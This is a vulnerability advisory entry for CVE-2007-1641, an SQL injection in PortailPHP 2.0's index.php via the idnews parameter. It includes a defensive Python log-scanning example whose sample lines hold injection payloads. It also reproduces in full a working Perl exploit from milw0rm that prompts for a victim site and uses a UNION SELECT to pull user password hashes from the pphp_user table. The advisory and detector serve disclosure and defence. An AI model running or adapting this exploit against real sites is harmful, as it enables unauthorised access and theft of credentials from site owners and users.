PortailPHP index.php SQL Injection Vulnerability

Vulnerability ID: 1112518    Vulnerability type: SQL injection
Published: 2007-03-22    Updated: 2007-03-27
CVE ID: CVE-2007-1641    CNNVD-ID: CNNVD-200703-607
Platform: PHP    CVSS score: 7.5
|Source
https://www.exploit-db.com/exploits/3543
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200703-607
|Vulnerability details
A SQL injection vulnerability exists in index.php of PortailPHP 2.0. A remote attacker can execute arbitrary SQL commands via the idnews parameter.
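The following is an added detection example, not code from the advisory or from the PortailPHP project. It scans web access logs for index.php requests whose idnews value is not a plain integer. The log lines are constructed samples, and the rule that legitimate idnews values are non-negative integers is an assumption; the function name is hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Common Log Format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [22/Mar/2007:10:01:02 +0000] "GET /portailphp/index.php?affiche=Comment&act=lire&idnews=12 HTTP/1.1" 200 5120
203.0.113.9 - - [22/Mar/2007:10:03:44 +0000] "GET /portailphp/index.php?affiche=Comment&act=lire&idnews=-1/**/union/**/select/**/0 HTTP/1.1" 200 4876
203.0.113.9 - - [22/Mar/2007:10:03:50 +0000] "GET /portailphp/index.php?affiche=Comment&act=lire&idnews=12%27 HTTP/1.1" 200 4876
198.51.100.7 - - [22/Mar/2007:10:05:10 +0000] "GET /portailphp/index.php?affiche=News HTTP/1.1" 200 3301
"""

# Client address and request target from a Common Log Format line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Assumption: a legitimate news id is a short, non-negative decimal integer.
VALID_ID_RE = re.compile(r"[0-9]{1,10}")


def suspicious_idnews(log_text):
    """Return (client, decoded idnews value) for every index.php request
    whose idnews parameter is not a plain integer."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we understand
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/index.php"):
            continue
        # parse_qs percent-decodes values, so encoded payloads are compared
        # in decoded form; keep_blank_values lets an empty idnews= be flagged.
        params = parse_qs(url.query, keep_blank_values=True)
        for value in params.get("idnews", []):
            if not VALID_ID_RE.fullmatch(value):
                hits.append((client, value))
    return hits


if __name__ == "__main__":
    for client, value in suspicious_idnews(SAMPLE_LOG):
        print(f"{client}\tidnews={value!r}")
```

The same integer-only rule can be enforced server-side by rejecting or casting idnews before it reaches any query.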
|Exploit
use LWP::Simple;
print "
Exploit Coded (c) by xoron
Portail PHP v20 (index.php) Remote SQL Injection Exploit
Languages: Turkish, English
Plz Select Language:";
$dil = <stdin>;
%eng = (
    "site" => "Enter The Victim Without http://:",
    "path" => "Plz Select Path:",
    "id" => "Plz Select User ID:"
);
%turk = (
    "site" => "Site Adi http:// ile baslayan:",
    "path" => "Dizin:",
    "id" => "ID: "
);
if($dil=~/^turkish$/i){
    %dil = %turk;
}
elsif($dil=~/^english$/i){
    %dil = %eng;
}
else{print "Undefined Language"; exit}
print $dil{site};
chop($site=<stdin>);
$site = "http://$site" if !($site=~/^http/);
print $dil{path};
chop($dir=<stdin>);
$dir = "/portailphp/" if !$dir;
print $dil{id};
chop($id =<stdin>);
$id = 2 if !$id;
print "Connecting to $site\n";
$sql = "index.php?affiche=Comment&act=lire&idnews=-1/**/union/**/select/**/0,";
$sql .= "1,2,US_pwd,4,5,6,7,8,9,10/**/from/**/pphp_user/**/where/**/US_uid=$id/*";
$get = get("$site$dir$sql");
if($get){
    if($get=~/<td><strong>\&nbsp\;\&nbsp\;(.*?)<\/strong>/){
        print "You are very Lucky Boy\nI Got Hash 4 ya\nID: $id\nHash: $1";
        exit
    }
    elsif($get=~/<td><strong>(.*?)<\/strong>/){
        print "Yep I got hash 4 ya\nID: $id\nHash: $1\n";
        exit;
    }
    else{print "Exploit Failed\n";exit}
}
print "Connect Failed to $site\n";
exit;

# milw0rm.com [2007-03-22]
|References

Source: BID
Name: 23096
Link: http://www.securityfocus.com/bid/23096
Source: MILW0RM
Name: 3543
Link: http://www.milw0rm.com/exploits/3543
Source: OSVDB
Name: 34410
Link: http://osvdb.org/34410
Source: XF
Name: portailphp-idnews-sql-injection(33145)
Link: http://xforce.iss.net/xforce/xfdb/33145
Source: SECUNIA
Name: 24620
Link: http://secunia.com/advisories/24620